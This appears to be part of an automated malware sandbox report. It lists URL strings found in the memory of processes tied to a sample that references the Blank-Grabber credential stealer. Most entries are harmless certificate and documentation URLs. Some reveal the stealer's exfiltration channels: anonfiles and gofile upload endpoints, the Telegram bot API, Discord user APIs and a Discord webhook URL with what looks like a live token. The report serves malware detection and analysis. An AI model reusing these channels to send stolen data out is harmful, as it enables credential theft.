              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingrzr
              Source: powershell.exe, 0000000C.00000002.1792042705.000002119FF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.2029247692.000001C7259B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1977970654.000001C71739C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.2029247692.000001C725AF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: phost.exe, 00000000.00000003.1677087289.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678323693.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677482019.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680438634.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676333004.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1679137996.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676118699.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1675971117.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676634666.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677207017.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678869412.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1681353706.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676526490.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677342281.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678758922.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: phost.exe, 00000000.00000003.1677087289.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678323693.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677482019.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680438634.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676333004.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1679137996.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676118699.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1675971117.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677087289.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676634666.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677207017.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678869412.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000002.2191688030.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1681353706.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676526490.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677342281.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678758922.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: phost.exe, 00000000.00000003.1677087289.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678323693.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677482019.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680438634.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676333004.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1679137996.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676118699.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1675971117.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677087289.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676634666.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677207017.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678869412.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000002.2191688030.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1681353706.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676526490.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677342281.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678758922.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: phost.exe, 00000000.00000003.1677087289.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678323693.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677482019.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680438634.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676333004.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1679137996.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676118699.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1675971117.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676634666.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677207017.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678869412.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1681353706.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676526490.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677342281.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678758922.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 0000004A.00000002.1977970654.000001C717252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680222477.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680222477.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 0000000C.00000002.1766471462.00000211900C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 0000000C.00000002.1766471462.000002118FEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1977970654.000001C715941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000C.00000002.1766471462.00000211900C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: phost.exe, 00000001.00000002.2179089914.000001AE1DAA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680222477.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680222477.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680222477.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 0000004A.00000002.1977970654.000001C7170AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 0000004A.00000002.1977970654.000001C717252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: phost.exe, 00000000.00000003.1677087289.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678323693.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677482019.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680438634.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676333004.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1679137996.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676118699.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1675971117.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676634666.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677207017.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678869412.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1681353706.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676526490.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677342281.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678758922.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: phost.exe, 00000001.00000002.2177248707.000001AE1D1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: phost.exe, 00000001.00000003.2170059092.000001AE1D721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftHEETS~1.MD5y./
              Source: phost.exe, 00000001.00000003.1837339893.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1817643168.000001AE1D730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftJDICCL~1PMAy./
              Source: phost.exe, 00000001.00000003.1849010645.000001AE1D730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftMESSAG~1.JSOy./
              Source: phost.exe, 00000001.00000003.1886265486.000001AE1D730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftOOGLE~1.MD5y./
              Source: phost.exe, 00000001.00000002.2178359191.000001AE1D730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftTASKLI~1.TXTy./
              Source: phost.exe, 00000001.00000003.1854068522.000001AE1D730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftVERIFI~1.JSOy./
              Source: phost.exe, 00000001.00000002.2178359191.000001AE1D730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftXZXHAV~1.DOCy.QN_
              Source: phost.exe, 00000001.00000003.1866119745.000001AE1E6F3000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: phost.exe, 00000001.00000003.2169554554.000001AE1E117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: phost.exe, 00000001.00000003.1866119745.000001AE1E6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179807278.000001AE1E6EA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E964000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 0000000C.00000002.1766471462.000002118FEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1977970654.000001C715941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerrz
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerrzr
              Source: phost.exe, 00000001.00000003.2169952863.000001AE1D329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.stripe.com/v
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1885946451.000001AE1D336000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848757509.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2169952863.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177462355.000001AE1D338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: phost.exe, 00000001.00000003.2169952863.000001AE1D329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/
              Source: phost.exe, 00000001.00000003.2169554554.000001AE1E117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: phost.exe, 00000001.00000003.2169554554.000001AE1E117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: phost.exe, 00000001.00000003.2169554554.000001AE1E117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 0000004A.00000002.2029247692.000001C725AF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000004A.00000002.2029247692.000001C725AF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000004A.00000002.2029247692.000001C725AF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680222477.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680222477.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680222477.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: phost.exe, 00000001.00000002.2178966357.000001AE1D9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPs
              Source: phost.exe, 00000001.00000003.2169952863.000001AE1D329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v
              Source: phost.exe, 00000001.00000002.2177140880.000001AE1D0A0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: phost.exe, 00000001.00000002.2176356488.000001AE1B291000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: phost.exe, 00000001.00000002.2176648071.000001AE1CC60000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176648071.000001AE1CCDC000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176648071.000001AE1CCDC000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176648071.000001AE1CCDC000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176648071.000001AE1CCDC000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: phost.exe, 00000001.00000002.2176790969.000001AE1CEA0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
              Source: phost.exe, 00000001.00000002.2176790969.000001AE1CEA0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176648071.000001AE1CCDC000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
              Source: phost.exe, 00000001.00000002.2176893974.000001AE1CFA0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684912540.000001AE1CFA2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
              Source: phost.exe, 00000001.00000003.2169554554.000001AE1E117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: phost.exe, 00000001.00000003.2169554554.000001AE1E117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: phost.exe, 00000001.00000003.2169554554.000001AE1E117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: phost.exe, 00000001.00000002.2178966357.000001AE1DA0C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: svchost.exe, 00000014.00000003.1751303220.000001E22D972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
              Source: svchost.exe, 00000014.00000003.1751303220.000001E22D906000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
              Source: svchost.exe, 00000014.00000003.1751303220.000001E22D972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
              Source: svchost.exe, 00000014.00000003.1751303220.000001E22D953000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.1751303220.000001E22D972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: svchost.exe, 00000014.00000003.1751303220.000001E22D972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
              Source: phost.exe, 00000001.00000002.2176893974.000001AE1D044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: phost.exe, 00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1885946451.000001AE1D336000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848757509.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2169952863.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177462355.000001AE1D338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
              Source: phost.exe, 00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1885946451.000001AE1D336000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848757509.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2169952863.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177462355.000001AE1D338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberr
              Source: phost.exe, 00000001.00000003.1696381167.000001AE1D8A6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1696732684.000001AE1D31E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: powershell.exe, 0000004A.00000002.1977970654.000001C717252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: phost.exe, 00000001.00000002.2176893974.000001AE1CFA0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684912540.000001AE1CFA2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176648071.000001AE1CCDC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
